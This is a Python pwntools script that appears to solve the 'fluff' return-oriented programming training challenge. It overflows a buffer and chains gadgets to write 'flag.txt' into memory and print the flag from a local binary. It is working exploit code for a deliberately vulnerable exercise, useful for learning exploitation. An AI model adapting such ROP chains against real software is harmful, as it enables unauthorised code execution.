x86_64/fluff/exploit.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

#!/usr/bin/env python3
from pwn import *

letter_lookups = {
        'f' : 0x00000000004003c4,
        'l' : 0x0000000000400239,
        'a' : 0x00000000004003d6,
        'g' : 0x00000000004003cf,
        '.' : 0x0000000000400251,
        't' : 0x0000000000400192,
        'x' : 0x0000000000400246}

def write_str(dest, string, payload):
    payload += p64(0x00000000004006a3)
    payload += p64(dest)
    for c in string:
        payload += p64(0x40062a)
        payload += p64(0x4000) # if things go wrong, check endian/order
        payload += p64(letter_lookups[c] - 0x3ef2)

        payload += p64(0x0000000000400610)
        payload += p64(0)

        payload += p64(0x400628)

        payload += p64(0x400639)

    return(payload)
        

prog = gdb.debug('./fluff', gdbscript='''
break *pwnme + 151
'''
)
payload = b''
for c in range(40):
    payload += b'a'

payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
payload += p64(0x601be0) # set rdi

payload += p64(0x0000000000400510)

payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
prog.interactive()